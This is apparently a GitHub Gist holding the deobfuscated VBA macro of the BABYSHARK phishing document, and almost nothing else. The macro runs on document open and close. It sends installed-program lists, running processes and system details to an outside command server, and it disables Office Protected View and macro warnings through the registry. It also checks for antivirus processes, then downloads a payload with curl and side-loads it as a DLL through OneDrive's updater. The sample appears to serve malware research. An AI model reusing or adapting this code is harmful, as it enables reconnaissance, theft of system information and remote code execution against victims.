-
-
Save JohnHammond/070af94c211536109642feff1fbc950e to your computer and use it in GitHub Desktop.
BABYSHARK malware deobfuscated phish
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Dim OneDriveFlag | |
| Function readFromRegistry(strRegistryKey, strDefault) | |
| Dim WSHShell, value | |
| On Error Resume Next | |
| Set WSHShell = CreateObject("WScript.Shell") | |
| value = WSHShell.RegRead(strRegistryKey) | |
| If Err.Number <> 0 Then | |
| Err.Number = 0 | |
| readFromRegistry = strDefault | |
| Else | |
| readFromRegistry = value | |
| End If | |
| Set WSHShell = Nothing | |
| End Function | |
| Function Modi(a0) | |
| Modi = "" | |
| For ix = 1 To Len(a0) | |
| aa = Mid(a0, ix, 1) | |
| bb = "_" | |
| If Asc(aa) > 47 And Asc(aa) < 58 Then | |
| bb = aa | |
| End If | |
| If Asc(aa) > 64 And Asc(aa) < 91 Then | |
| bb = aa | |
| End If | |
| If Asc(aa) > 96 And Asc(aa) < 123 Then | |
| bb = aa | |
| End If | |
| If Asc(aa) = 46 Then | |
| bb = aa | |
| End If | |
| Modi = Modi + bb | |
| Next | |
| End Function | |
| Sub AutoOpen() | |
| On Error Resume Next | |
| OneDriveFlag = 0 | |
| Set ws = CreateObject("WScript.Shell") | |
| Set fs = CreateObject("Scripting.FileSystemObject") | |
| dirlist = "" | |
| StrProgPath = "c:\Program Files (x86)" | |
| If fs.FolderExists(StrProgPath) Then | |
| dirlist = StrProgPath + "ENTER" | |
| Set ObjProgPath = fs.GetFolder(StrProgPath) | |
| For Each SubFolder In ObjProgPath.SubFolders | |
| dirlist = dirlist + SubFolder.Name + "ENTER" | |
| Next | |
| End If | |
| dirlist = dirlist + "ENTER" | |
| StrProgPath = "c:\Program Files" | |
| If fs.FolderExists(StrProgPath) Then | |
| dirlist = dirlist + StrProgPath + "ENTER" | |
| Set ObjProgPath = fs.GetFolder(StrProgPath) | |
| For Each SubFolder In ObjProgPath.SubFolders | |
| dirlist = dirlist + SubFolder.Name + "ENTER" | |
| Next | |
| End If | |
| dirlist = dirlist + "ENTER" | |
| StrProgPath = ws.ExpandEnvironmentStrings("%localappdata%") + "\Microsoft\OneDrive\OneDrive.exe" | |
| If fs.FileExists(StrProgPath) Then | |
| dirlist = dirlist + StrProgPath + "ENTER" | |
| OneDriveFlag = 1 | |
| End If | |
| Set Post0 = CreateObject("msxml2.xmlhttp") | |
| Post0.Open "POST", "https://beastmodser.club/sil/030.php", 0 | |
| Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" | |
| Post0.Send (Modi(dirlist)) | |
| Dim CurDoc As Document | |
| Set CurDoc = ActiveDocument | |
| Documents.Open "http://beastmodser.club/sil/0304/VOA_Korea.docx" | |
| CurDoc.Close | |
| End Sub | |
| Sub AutoClose() | |
| On Error Resume Next | |
| Set objWMIService = GetObject("winmgmts://./root/cimv2") | |
| Set colItems = objWMIService.ExecQuery("Select * from Win32_Battery") | |
| onedrivestatus = "AutoRun " + readFromRegistry("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive", "error") | |
| IsLaptop = False | |
| For Each objItem In colItems | |
| IsLaptop = True | |
| Next | |
| If IsLaptop <> True Then | |
| pcstatus = "Desktop " | |
| Else | |
| pcstatus = "Laptop " | |
| End If | |
| Status = pcstatus + "ENTER" | |
| isProcessRunning = "" | |
| Set objWMIService = GetObject("winmgmts:{impersonationLevel=Impersonate}!\\localhost\root\cimv2") | |
| If (Err.Number = 0) Then | |
| Set lstProcesses = objWMIService.ExecQuery("Select * from Win32_Process") | |
| isProcessRunning = "" | |
| For Each objProcess In lstProcesses | |
| isProcessRunning = isProcessRunning + LCase(objProcess.Name) + " " | |
| Next | |
| End If | |
| Status = Status + onedrivestatus + "ENTER" + isProcessRunning + "ENTER" | |
| Set Post0 = CreateObject("msxml2.xmlhttp") | |
| Post0.Open "POST", "https://beastmodser.club/sil/030.php", 0 | |
| Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" | |
| Post0.Send (Modi(Status)) | |
| Set ws = CreateObject("WScript.Shell") | |
| Set fs = CreateObject("Scripting.FileSystemObject") | |
| If InStr(isProcessRunning, "bdagent.exe") Or InStr(isProcessRunning, "nortonsecurity.exe") Or InStr(isProcessRunning, "eppwsc.exe") Then | |
| Else | |
| cmdline = "cmd.exe /c reg add ""HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView"" /v DisableAttachementsInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView"" /v DisableInternetFilesInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView"" /v DisableUnsafeLocationsInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\13.0\Word\Security\ProtectedView"" /v DisableAttachementsInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\13.0\Word\Security\ProtectedView"" /v DisableInternetFilesInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\13.0\Word\Security\ProtectedView"" /v DisableUnsafeLocationsInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView"" /v DisableAttachementsInPV /t REG_DWORD /d ""1"" /f" | |
| cmdline = cmdline + "® add ""HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView"" /v DisableInternetFilesInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView"" /v DisableUnsafeLocationsInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView"" /v DisableAttachementsInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView"" /v DisableInternetFilesInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView"" /v DisableUnsafeLocationsInPV /t REG_DWORD /d ""1"" /f® add ""HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView"" /v DisableAttachementsInPV /t REG_DWORD /d ""1"" /f ® add ""HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView"" /v DisableInternetFilesInPV /t REG_DWORD /d ""1"" /f" | |
| cmdline = cmdline + "® add ""HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView"" /v DisableUnsafeLocationsInPV /t REG_DWORD /d ""1"" /f ® add ""HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security"" /v VBAWarnings /t REG_DWORD /d ""1"" /f® add ""HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Word\Security"" /v VBAWarnings /t REG_DWORD /d ""1"" /f® add ""HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security"" /v VBAWarnings /t REG_DWORD /d ""1"" /f® add ""HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security"" /v VBAWarnings /t REG_DWORD /d ""1"" /f® add ""HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security"" /v VBAWarnings /t REG_DWORD /d ""1"" /f" | |
| re = ws.Run(cmdline, 0, True) | |
| macrostatus = readFromRegistry("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", "error") | |
| If macrostatus <> "1" Then | |
| macrostatus = "Macro Closed " | |
| Else | |
| macrostatus = "Macro Opened " | |
| End If | |
| Set Post0 = CreateObject("msxml2.xmlhttp") | |
| Post0.Open "POST", "https://beastmodser.club/sil/030.php", 0 | |
| Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" | |
| Post0.Send (Modi(macrostatus)) | |
| If OneDriveFlag <> 0 Then | |
| cc = "curl -o ""%userprofile%\AppData\Local\Microsoft\OneDrive\version.tmp""" + "https://beastmodser.club/sil/0304/d.php?na=version.gif" | |
| cmdline = "cmd.exe /c taskkill /im onedrive.exe /f &" + cc | |
| cmdline = cmdline + "&timeout 2 & %windir%\sysnative\" + cc | |
| cmdline = cmdline + "&timeout 4 & ren ""%userprofile%\AppData\Local\Microsoft\OneDrive\version.tmp"" version.dll" | |
| cmdline = cmdline + "&timeout 4 & ""%userprofile%\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe""" | |
| re = ws.Run(cmdline, 0, False) | |
| End If | |
| End If | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment